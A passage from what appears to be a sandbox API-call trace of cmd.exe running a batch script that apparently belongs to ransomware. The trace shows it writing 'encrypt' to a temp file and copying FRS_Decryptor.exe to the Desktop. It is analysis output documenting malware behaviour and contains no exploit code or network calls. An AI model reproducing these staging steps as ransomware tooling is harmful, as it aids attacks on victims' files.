lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\echo.encrypt", fInfoLevelId=0x1, lpFindFileData=0xc8ed78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed78) returned 0xffffffff [0037.071] GetLastError () returned 0x2 [0037.071] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\echo.encrypt.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0037.071] GetLastError () returned 0x2 [0037.072] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.072] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\echo.encrypt", fInfoLevelId=0x1, lpFindFileData=0xc8ed78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed78) returned 0xffffffff [0037.072] GetLastError () returned 0x2 [0037.072] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\echo.encrypt.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0037.072] GetLastError () returned 0x2 [0037.072] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.072] FindFirstFileExW (in: lpFileName="C:\\Windows\\echo.encrypt", fInfoLevelId=0x1, lpFindFileData=0xc8ed78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed78) returned 0xffffffff [0037.073] GetLastError () returned 0x2 [0037.073] FindFirstFileExW (in: lpFileName="C:\\Windows\\echo.encrypt.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0037.073] GetLastError () returned 0x2 [0037.073] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.073] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\echo.encrypt", fInfoLevelId=0x1, lpFindFileData=0xc8ed78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed78) returned 0xffffffff [0037.075] GetLastError () returned 0x2 [0037.075] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\echo.encrypt.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0037.076] GetLastError () returned 0x2 [0037.076] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.076] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\echo.encrypt", fInfoLevelId=0x1, lpFindFileData=0xc8ed78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed78) returned 0xffffffff [0037.078] GetLastError () returned 0x2 [0037.078] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\echo.encrypt.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0037.079] GetLastError () returned 0x2 [0037.079] GetFileType (hFile=0x28) returned 0x2 [0037.079] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0037.079] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xc8efb4 | out: lpMode=0xc8efb4) returned 1 [0037.080] _dup (_FileHandle=1) returned 3 [0037.080] _close (_FileHandle=1) returned 0 [0037.080] _wcsicmp (_String1="C:\\FRS_TEMP\\temp.txt", _String2="con") returned -53 [0037.080] CreateFileW (lpFileName="C:\\FRS_TEMP\\temp.txt" (normalized: "c:\\frs_temp\\temp.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0037.081] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0037.081] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0037.081] GetFileAttributesW (lpFileName="echo.encrypt" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\echo.encrypt")) returned 0xffffffff [0037.081] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0037.081] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0037.081] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0037.081] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0037.081] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0037.081] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0037.081] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0037.081] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0037.081] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0037.081] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0037.081] GetFileType (hFile=0x28) returned 0x1 [0037.081] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.081] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="encrypt\r\n", cchWideChar=-1, lpMultiByteStr=0x12b6840, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="encrypt\r\n", lpUsedDefaultChar=0x0) returned 10 [0037.081] WriteFile (in: hFile=0x28, lpBuffer=0x12b6840*, nNumberOfBytesToWrite=0x9, lpNumberOfBytesWritten=0xc8ed5c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesWritten=0xc8ed5c*=0x9, lpOverlapped=0x0) returned 1 [0037.082] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0037.083] _close (_FileHandle=3) returned 0 [0037.083] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.083] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0037.083] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.083] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0037.083] _get_osfhandle (_FileHandle=0) returned 0x24 [0037.083] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0037.083] SetConsoleInputExeNameW () returned 0x1 [0037.083] GetConsoleOutputCP () returned 0x1b5 [0037.084] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0037.084] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.084] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0037.084] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0037.084] _get_osfhandle (_FileHandle=3) returned 0x80 [0037.084] SetFilePointer (in: hFile=0x80, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0037.084] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0037.084] ReadFile (in: hFile=0x80, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x4b8, lpOverlapped=0x0) returned 1 [0037.084] SetFilePointer (in: hFile=0x80, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0037.084] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\n") returned 80 [0037.084] GetFileType (hFile=0x80) returned 0x1 [0037.084] _get_osfhandle (_FileHandle=3) returned 0x80 [0037.084] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0037.085] GetEnvironmentVariableW (in: lpName="MYFILES", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F") returned 0x2f [0037.085] GetEnvironmentVariableW (in: lpName="username", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="5JgHKoaOfdp") returned 0xb [0037.085] _tell (_FileHandle=3) returned 1542 [0037.085] _close (_FileHandle=3) returned 0 [0037.085] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0037.085] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0037.085] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0037.085] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0037.085] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0037.085] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0037.086] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.086] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.086] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.086] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.087] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.088] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.088] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.088] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.088] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.088] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.088] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.088] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.088] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.088] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.088] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.088] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.088] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.088] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.088] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.088] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.088] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.088] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.088] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.088] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\frs_decryptor.exe")) returned 0x20 [0037.088] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0xcf0000 [0037.088] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe", fInfoLevelId=0x1, lpFindFileData=0xd1bc10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd1bc10) returned 0xd27148 [0037.088] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS_Decryptor.exe", nBufferLength=0x104, lpBuffer=0xc8e080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS_Decryptor.exe", lpFilePart=0x0) returned 0x2e [0037.089] _wcsicmp (_String1="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe", _String2="con") returned -53 [0037.089] CreateFileW (lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\frs_decryptor.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e284, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x8c [0037.089] _open_osfhandle (_OSFileHandle=0x8c, _Flags=8) returned 3 [0037.089] _get_osfhandle (_FileHandle=3) returned 0x8c [0037.089] GetFileType (hFile=0x8c) returned 0x1 [0037.089] SetErrorMode (uMode=0x0) returned 0x0 [0037.089] SetErrorMode (uMode=0x1) returned 0x0 [0037.089] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe", nBufferLength=0x208, lpBuffer=0xc8e728, lpFilePart=0xc8e294 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe", lpFilePart=0xc8e294*="FRS_Decryptor.exe") returned 0x41 [0037.089] SetErrorMode (uMode=0x0) returned 0x1 [0037.089] ReadFile (in: hFile=0x8c, lpBuffer=0xcf0000, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e2b8, lpOverlapped=0x0 | out: lpBuffer=0xcf0000*, lpNumberOfBytesRead=0xc8e2b8*=0x200, lpOverlapped=0x0) returned 1 [0037.089] SetErrorMode (uMode=0x0) returned 0x0 [0037.089] SetErrorMode (uMode=0x1) returned 0x0 [0037.089] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS_Decryptor.exe", nBufferLength=0x208, lpBuffer=0xc8de80, lpFilePart=0xc8de64 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS_Decryptor.exe", lpFilePart=0xc8de64*="FRS_Decryptor.exe") returned 0x2e [0037.089] SetErrorMode (uMode=0x0) returned 0x1 [0037.089] _wcsicmp (_String1="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe", _String2="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS_Decryptor.exe") returned -3 [0037.089] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS_Decryptor.exe" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\frs_decryptor.exe")) returned 0xffffffff [0037.089] GetLastError () returned 0x2 [0037.089] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS_Decryptor.exe", nBufferLength=0x104, lpBuffer=0xc8e080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS_Decryptor.exe", lpFilePart=0x0) returned 0x2e [0037.089] SetErrorMode (uMode=0x0) returned 0x0 [0037.089] SetErrorMode (uMode=0x1) returned 0x0 [0037.089] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS_Decryptor.exe", nBufferLength=0x208, lpBuffer=0xc8de80, lpFilePart=0xc8de64 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS_Decryptor.exe", lpFilePart=0xc8de64*="FRS_Decryptor.exe") returned 0x2e [0037.090] SetErrorMode (uMode=0x0) returned 0x1 [0037.090] _wcsicmp (_String1="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe", _String2="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS_Decryptor.exe") returned -3 [0037.090] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS_Decryptor.exe" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\frs_decryptor.exe")) returned 0xffffffff [0037.090] CopyFileExW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\frs_decryptor.exe"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS_Decryptor.exe" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\frs_decryptor.exe"), lpProgressRoutine=0x0, lpData=0x0, pbCancel=0x12b5164, dwCopyFlags=0x0) returned 1 [0037.106] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS_Decryptor.exe" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\frs_decryptor.exe")) returned 0x20 [0037.106] SetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS_Decryptor.exe", dwFileAttributes=0x20) returned 1 [0037.106] _close (_FileHandle=3) returned 0 [0037.106] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0037.106] GetFileType (hFile=0xffffffff) returned 0x0 [0037.106] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0037.106] SetFileTime (hFile=0xffffffff, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0xc8e310) returned 0 [0037.106] FindNextFileW (in: hFindFile=0xd27148, lpFindFileData=0xd1bc10 | out: lpFindFileData=0xd1bc10) returned 0 [0037.106] GetLastError () returned 0x12 [0037.106] FindClose (in: hFindFile=0xd27148 | out: hFindFile=0xd27148) returned 1 [0037.107] _vsnwprintf (in: _Buffer=0x12d0890, _BufferCount=0x103, _Format="%9d", _ArgList=0xc8ed44 | out: _Buffer=" 1") returned 9 [0037.107] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.107] GetFileType (hFile=0x28) returned 0x2 [0037.107] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0037.107] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xc8ecb8 | out: lpMode=0xc8ecb8) returned 1 [0037.108] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.108] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x28, lpConsoleScreenBufferInfo=0xc8ed08 | out: lpConsoleScreenBufferInfo=0xc8ed08) returned 1 [0037.108] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) copied.\r\n") returned 0x14 [0037.108] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0xc8ed38 | out: lpBuffer=" 1 file(s) copied.\r\n") returned 0x1b [0037.108] WriteConsoleW (in: hConsoleOutput=0x28, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0xc8ecec, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0xc8ecec*=0x1b) returned 1 [0037.110] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0xc8ed58, ProcessInformationLength=0x4) returned 0x0 [0037.110] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.110] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0037.110] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.110] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0037.110] _get_osfhandle (_FileHandle=0) returned 0x24 [0037.110] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0037.110] SetConsoleInputExeNameW () returned 0x1 [0037.110] GetConsoleOutputCP () returned 0x1b5 [0037.110] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0037.110] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.111] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0037.111] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0037.111] _get_osfhandle (_FileHandle=3) returned 0x80 [0037.111] SetFilePointer (in: hFile=0x80, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0037.111] VirtualFree (lpAddress=0xcf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0037.111] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0037.111] ReadFile (in: hFile=0x80, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x468, lpOverlapped=0x0) returned 1 [0037.111] SetFilePointer (in: hFile=0x80, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0037.111] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, 